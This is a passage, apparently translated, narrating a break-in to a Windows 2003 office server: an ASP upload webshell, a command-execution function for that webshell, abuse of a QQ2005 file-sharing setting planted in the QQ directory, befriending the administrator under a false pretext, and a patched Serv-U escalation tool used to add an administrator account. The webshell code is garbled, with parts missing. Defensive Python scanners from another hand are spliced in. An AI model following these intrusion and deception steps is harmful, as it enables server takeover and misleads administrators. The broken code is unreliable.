SoFunction
Updated on 2025-04-09

Using a QQ file-sharing vulnerability to completely break through the solid fortress of Windows 2003

Third-party software running on servers has always been seen by attackers as a shortcut into target systems. Now the famous Tencent QQ has joined that list of shortcuts. Fortunately, QQ is not software a server needs, so I believe it will not cause a large-scale crisis. Although the situation in this article is not particularly unusual, everyone should still put corresponding defenses in place, on the principle of "prevent whatever can be prevented".
1. Obtaining a webshell on Windows 2003
The target of this penetration is an OA office-system server. Its operating system was recently upgraded to Windows 2003, but the OA application still has an ASP file-upload vulnerability, so obtaining a webshell was never in doubt.
Obstacles were encountered when escalating privileges:
After logging in to the webshell, I found that I could only view the server's D drive and could not access anything on the C drive; the webshell reported "No permissions". This was expected, because the webshell has only Guests-group permissions, and by default Windows 2003 denies access to the "Everyone" anonymous users and to users with "Guests" group permissions, which is also why commands cannot be run through the webshell.
The one fortunate thing is that the webshell can read and write the various subdirectories of the D drive (which holds the web virtual directories). Besides the web virtual directory, there are also some data backup files and a Tencent QQ installation directory, Tencent.
2. Cracking the "ultimate defense" of Serv-U
The various default security configurations of Windows 2003 showed their powerful side, and it seemed unlikely that I would escalate my existing permissions any time soon, until I tried issuing an FTP connection request to this server from my own system and saw the Serv-U banner.
As mentioned earlier, the permission restrictions of Windows 2003 prevent commands from running through the webshell. The same claim was made in the article "Building a Windows 2003 Fortress Host" in the 6th issue of Defense in 2004. However, practice shows that it is not correct: by uploading an unrestricted copy of the shell program from a local, non-2003 system through the webshell into a directory where execution is allowed, and then invoking it through the wscript components, you can still obtain the corresponding permissions under Windows 2003 via the webshell. Combined, you can even get a command-line shell with Guests-group permissions.
To do this, I made some improvements to Veteran's Webmaster Assistant 6.0 and added the following code so that it can use the components to run the locally uploaded program.
Function CmdShell()
    ' Note: the object ClassIDs and several method names in this listing were lost
    ' when the page was extracted; those spots are marked below and left as they appear.
    If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
    ShellPath=Session("ShellPath")
    If ShellPath="" Then ShellPath = ""    ' default shell path (value missing from the page)
    If Request("wscript")="yes" Then
        checked=" checked"
    Else
        checked=""
    End If
    If Request("cmd")<>"" Then DefCmd = Request("cmd")
    SI="<form method='post'><input name='cmd' Style='width:92%' class='cmd' value='"&DefCmd&"'><input type='submit' value='run'>"
    SI=SI&"<textarea Style='width:100%;height:500;' class='cmd'>"
    If Request("cmd")<>"" Then
        If Request("wscript")="yes" Then
            ' run through the component whose ProgID is looked up from the ObT table
            Set CM=CreateObject(ObT(1,0))
            Set DD=(ShellPath&" /c "&DefCmd)    ' method name missing from the page
            aaa=                                ' command output is read here; expression missing from the page
            SI=SI&aaa
        Else%>
<object runat=server id=ws scope=page class></object>
<object runat=server id=fso scope=page class></object>
<%          szTempFile = ("")    ' temporary file path; function name missing from the page
            Call  (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)    ' run the command, redirect output to the temp file
            Set fs = CreateObject("")    ' ProgID missing from the page
            Set oFilelcx =  (szTempFile, 1, False, 0)    ' open the temp file for reading
            aaa=()    ' read its contents
            Call (szTempFile, True)    ' delete the temp file
            SI=SI&aaa
        End If
    End If
    SI=SI&chr(13)&"</textarea>"
    SI=SI&"SHELL path: <input name='SP' value='"&ShellPath&"' Style='width:70%'>  "
    SI=SI&"<input type='checkbox' name='wscript' value='yes'"&checked&"></form>"
    SI    ' return/output statement truncated on the page
End Function
When using it, you only need to put the path of the uploaded program in the SHELL path box and tick the Wscript option to run some low-privilege system commands, such as "net start" or "netstat -an". Running these two commands in turn, the webshell echoed many services, including Serv-U FTP Server, and port 43958 appeared in the list of active ports, so I naturally thought of the powerful Serv-U FTP Server local privilege-escalation vulnerability. However, when I executed system commands through it, a 530 error appeared (as shown in Figure 1). It seems that the administrator or someone else had patched Serv-U or applied some security configuration. To find out what kind of security configuration it was, I looked through the relevant articles online. One of them, "The Ultimate Prevention of the Serv-U FTP Server Local Privilege-Escalation Vulnerability", is very popular and has been reposted widely; its author is Paradise Xiaolu. Judging from the error prompt, it is very likely that the so-called ultimate defense from that article had been applied, that is, the default administrator account or password had been changed. Of course, this was only a hypothesis; it could only be confirmed by downloading the configuration from the target server and looking at the specific settings. But the C drive where Serv-U is installed, including the Program Files directory, is inaccessible, so privilege escalation was blocked once again.
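The command-execution page above is the kind of thing a defender wants to catch in an upload directory before it is ever used. The scanner below is an added example (not code from the article or from Webmaster Assistant); it scores ASP sources against a small signature table covering the traits that page shows: a shell ProgID passed to CreateObject, a ProgID looked up from a table rather than written as a literal, a server-side object tag instantiated by ClassID, a "cmd" request parameter, Run/Exec calls and a "/c" command prefix. The signature names, weights, threshold and the three sample files are my own constructions, and the ClassID in the sample is an all-zero placeholder.

```python
import re

# Signature table: (name, pattern, weight). Weights and threshold are an
# illustrative assumption, not a published scoring scheme.
SIGNATURES = [
    ("shell-progid",
     re.compile(r'CreateObject\s*\(\s*"(?:WScript\.Shell|Shell\.Application)"', re.I), 5),
    # CreateObject whose argument is an expression, not a string literal:
    # the article's CmdShell() hides the ProgID behind ObT(1,0) this way.
    ("dynamic-progid", re.compile(r'CreateObject\s*\(\s*[A-Za-z_]', re.I), 3),
    ("fso-progid", re.compile(r'Scripting\.FileSystemObject', re.I), 2),
    ("cmd-parameter", re.compile(r'Request\s*\(\s*"(?:cmd|command|sp)"\s*\)', re.I), 3),
    ("run-or-exec", re.compile(r'\.(?:Run|Exec)\s*\(', re.I), 3),
    ("cmd-slash-c", re.compile(r'"\s*/c\s+"', re.I), 2),
]
OBJECT_TAG = re.compile(r'<object\b[^>]*>', re.I)
THRESHOLD = 6


def score_asp(source):
    """Return (score, hit_names) for one ASP source text."""
    hits = []
    score = 0
    for name, pattern, weight in SIGNATURES:
        if pattern.search(source):
            hits.append(name)
            score += weight
    # <object runat=server ... classid=...> creates a COM object by ClassID on
    # the server, bypassing ProgID-based blocklists.
    for tag in OBJECT_TAG.findall(source):
        low = tag.lower()
        if "runat" in low and "server" in low and "classid" in low:
            hits.append("server-object-by-clsid")
            score += 4
            break
    return score, hits


def scan(files):
    """files: {path: source}. Return the paths whose score reaches THRESHOLD."""
    return sorted(p for p, src in files.items() if score_asp(src)[0] >= THRESHOLD)


# Constructed sample pages (not from any real site).
SAMPLES = {
    "upload/ok.asp":
        '<% Dim n : n = Request.Form("name") : Response.Write Server.HTMLEncode(n) %>',
    "upload/list.asp":
        '<% Set fso = CreateObject("Scripting.FileSystemObject") : '
        'Response.Write fso.GetFolder(Server.MapPath(".")).Files.Count %>',
    "upload/cmd.asp":
        '<object runat=server id=ws scope=page '
        'classid="clsid:00000000-0000-0000-0000-000000000000"></object>\n'
        '<% If Request("cmd")<>"" Then\n'
        '     Set cm = CreateObject(ObT(1,0))\n'
        '     Call ws.Run(ShellPath & " /c " & Request("cmd") & " > " & tmp, 0, True)\n'
        '   End If %>',
}

if __name__ == "__main__":
    for path, src in SAMPLES.items():
        print(path, score_asp(src))
    print("flagged:", scan(SAMPLES))
```

Run it over the contents of every writable web directory on a schedule; a legitimate file-listing page (list.asp) scores below the threshold because FileSystemObject alone is common, while the command page trips several independent signatures at once.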
3. Using the QQ2005 shared-file vulnerability to finish the privilege escalation
Looking through the D drive again, I saw the Tencent folder, which one rarely sees on a server, and checked it.
I learned that the QQ version was QQ2005 Beta1, and the creation times of several related files showed that the network administrator had logged in to QQ on the server recently. Could QQ be of any use? After some thought, I finally remembered an exploitable vulnerability in the file-sharing function of QQ2005.
This vulnerability appeared with the new features added in QQ2005 New Year Edition. The harm can be described as follows: using it, an attacker can browse and read any file on the user's system (such as the SAM file, data backup files and files containing sensitive information). Affected systems: all Windows operating systems with QQ2005 New Year Edition or later installed.
The specific method of exploitation: first log in to your own QQ on your own machine, open the "QQ menu", select Tools -> Set Sharing, specify C:\ or any other valuable partition as a shared folder, close QQ when done, and find the corresponding file in the folder named after the QQ account in the installation directory (as shown in Figure 3). Then upload that same file to the target server (for example: D:\Tencent\QQ\654321\). In this way, when the network administrator logs in to QQ on the server, it will open the C drive to friends as a shared directory.
Because strangers cannot see the other party's shared files, it was also necessary to use social engineering to apply to add the administrator as a friend (the more plausible the reason, the better). If the administrator accepts the request, the server's C drive is shared under the name of the QQ shared-file directory, files that could not be accessed through the webshell can be downloaded, and the blocked road to privilege escalation can continue.
The administrator approved the application that night and added me as a friend. The IP shown on the other party's QQ was exactly the target server's IP, so I downloaded the file, opened it in UE, searched for 127.0.0.1, and found that the built-in account "LocalAdministrator" of the default configuration had indeed been changed to "LocalAdministruser". This seems a very "ultimate" defense, but Xiaolu, who proposed the method, appears to have published it without weighing attack against defense. Keep in mind that the attacker only needs to learn the modified configuration and make the corresponding change to the local privilege-escalation tool, and the so-called ultimate defense is broken. The method is to open the unpacked Serv-U local privilege-escalation tool in UE and change LocalAdministrator to LocalAdministruser.
Then upload the modified tool and run D:\web\ "net user user password /add" through it and look at the result: a user was added successfully. Then add the user to the Administrators group and the "Remote Desktop Users" group and log in to the target server's remote desktop.
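Both halves of this chapter hinge on an attacker writing a file into a third-party application's directory on a drive the webshell can reach (the sharing configuration dropped into D:\Tencent\QQ\654321\, and the modified escalation tool placed under D:\web\). A file-integrity baseline over those directories catches exactly that. The script below is an added example, not code from the article: snapshot() hashes every file under a root, diff() reports files that were added, modified or removed since the baseline, and demo() replays the scenario on a constructed temporary tree whose file names (ExampleUserData.db, example-share-config.cfg) are placeholders rather than real QQ file names.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        digest = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
        result[path.relative_to(root).as_posix()] = digest.hexdigest()
    return result


def diff(baseline, current):
    """Compare two snapshots; return sorted lists of added, removed and modified paths."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Replay the article's scenario on a constructed directory tree and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        qq = Path(tmp) / "Tencent" / "QQ"
        account = qq / "654321"          # account folder, mirroring the article's example path
        account.mkdir(parents=True)
        (qq / "ExampleQQ.exe").write_bytes(b"constructed binary content")
        (account / "ExampleUserData.db").write_bytes(b"constructed user data")
        baseline = snapshot(tmp)         # taken while the install is known-good

        # Simulated attacker activity: a sharing configuration is dropped into the
        # account folder and an existing file is altered (both constructed).
        (account / "example-share-config.cfg").write_bytes(b"constructed: share C:\\")
        (account / "ExampleUserData.db").write_bytes(b"constructed user data, altered")

        return diff(baseline, snapshot(tmp))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Store the baseline somewhere the web server's account cannot write, since the same guest-level webshell that drops the file could otherwise rewrite a baseline kept on the D drive, and run the comparison on a schedule so that a new file in an application directory is reported before the administrator's next login turns it into a shared drive.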
After many obstacles, we finally conquered this solid Windows 2003 fortress completely.
4. A simple lesson
It can be seen that, just as "the fewer services, the safer", the fewer third-party programs running on the server, the safer it is. The popular PcAnywhere, VNC and Serv-U privilege escalations, and the QQ2005 leverage described here, can all be avoided this way.